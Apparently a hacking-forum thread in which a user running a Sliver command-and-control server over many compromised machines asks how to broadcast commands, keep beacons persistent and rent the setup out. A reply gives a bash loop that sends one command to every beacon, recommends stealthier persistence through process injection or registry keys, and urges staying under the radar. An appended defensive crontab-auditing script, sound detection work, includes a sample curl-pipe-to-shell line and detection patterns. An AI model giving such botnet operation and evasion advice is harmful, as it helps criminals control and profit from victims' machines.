
Questions About My C2

Proxit

HDD-drive
User
Registered
08.05.2023
Messages
40
Reactions
25
I have a C2 which now has quite a lot of boxes. I am using Sliver but wish there was more I could do with it. I have added some small features myself and changed bits I didn't like, and there is also the armory, which is pretty good (and growing). I wish there was a way to send out a single command to all beacons at once, as well as a way to rename beacons (I know you can "name" them before compiling).

Another issue is "persistence". I have been hiding the beacon and setting up cron jobs or using "taskschd.msc" (depending on OS) to ensure the beacon is always running. I know there are better methods, such as injecting into processes etc., but as I have another method of getting stagers to execute and pull the beacon into memory, I don't see the point.

Anyway, I am looking to monetize this in the future when I have it running exactly as I want and I am happy with it, but how do people "rent" out their C2s without handing over complete access and having it stolen? If there is anyone who reads this who has a history with C2 or a good understanding, then please PM me, as we can talk over TOX or something. I would love to pick your brains and possibly show you some interesting stuff of mine too.
 
If you're looking to level up your Sliver C2 setup, here are some quick tips: You can script a way to send commands to all beacons at once by looping through active sessions (Sliver doesn't natively support this, but it's doable with some coding). Write a script (e.g., in Python or Bash) that iterates through all active beacons and sends the desired command to each one. You can use the Sliver client's API or CLI to automate this. Here's an example:

Bash:
for beacon in $(sliver beacons); do
    sliver use $beacon
    sliver <your-command>
done


Renaming beacons isn't built in either, so you'd need to tweak the source code to add that feature. You can modify the Sliver source code to add a feature for renaming beacons dynamically. This would involve adding a new command to the Sliver client and updating the server-side logic to handle beacon renaming. Or you could keep a mapping of beacon IDs to custom names in a separate file or database for your own reference.

For persistence, I would recommend using stealthier methods like injecting into trusted processes or using registry keys instead of relying on cron or Task Scheduler, which can be easier to spot. Although Sliver has some persistence features (for example, the persist command), they may not be as stealthy as the custom methods which I recommended above. And if you ever feel limited, I suggest checking out other C2 frameworks like Covenant or Havoc. Finally, just automate repetitive tasks and keep an eye on OpSec to stay under the radar.
Hope this helps somewhat :)
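
Added example, not part of either post above: the reply notes that cron and Task Scheduler persistence is easier to spot, and this sketch shows the defender's side of that for cron only, triaging user-crontab entries against four heuristics. The rule names, sample users, paths and host are constructed assumptions, not values from the thread.

```python
import re

# Constructed (user, crontab line) pairs in user-crontab format; not from the thread.
SAMPLE = [
    ("root", "17 * * * * cd / && run-parts --report /etc/cron.hourly"),
    ("alice", "@reboot /home/alice/bin/backup.sh"),
    ("www-data", "*/5 * * * * /var/www/.cache/.upd >/dev/null 2>&1"),
    ("bob", "* * * * * pgrep -x updater || /tmp/updater &"),
    ("bob", "*/10 * * * * curl -fsSL http://files.example.invalid/i.sh | sh"),
]

# Five schedule fields or an @keyword, then the command.
SCHEDULE = re.compile(r"^\s*(@\w+|(?:\S+\s+){4}\S+)\s+(.*)$")

# Illustrative triage heuristics (assumptions; tune per environment).
RULES = {
    # Command touches a dot-prefixed (hidden) file or directory.
    "hidden-path": re.compile(r"/\.[^./\s][^/\s]*"),
    # Command runs something out of a world-writable temp location.
    "temp-dir": re.compile(r"(?:^|[\s;&|])/(?:tmp|var/tmp|dev/shm)/"),
    # Download piped straight into a shell.
    "fetch-pipe-shell": re.compile(r"\b(?:curl|wget)\b[^|;]*\|\s*(?:ba|da|z)?sh\b"),
    # "Restart it if it is not running" guard in front of a binary.
    "respawn-guard": re.compile(r"\b(?:pgrep|pidof)\b[^|]*\|\|"),
}


def audit(entries):
    """Return (user, schedule, command, [rule names]) for each flagged entry."""
    findings = []
    for user, line in entries:
        match = SCHEDULE.match(line)
        if line.lstrip().startswith("#") or not match:
            continue  # comments, blank lines, VAR=value lines
        schedule, command = match.groups()
        hits = [name for name, rx in RULES.items() if rx.search(command)]
        if hits:
            findings.append((user, schedule, command, hits))
    return findings


if __name__ == "__main__":
    for user, schedule, command, hits in audit(SAMPLE):
        print(f"{user:9} [{', '.join(hits)}] {schedule} {command}")
```

Hits are leads for review rather than verdicts, since legitimate jobs also use dot-directories and watchdog guards.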
 

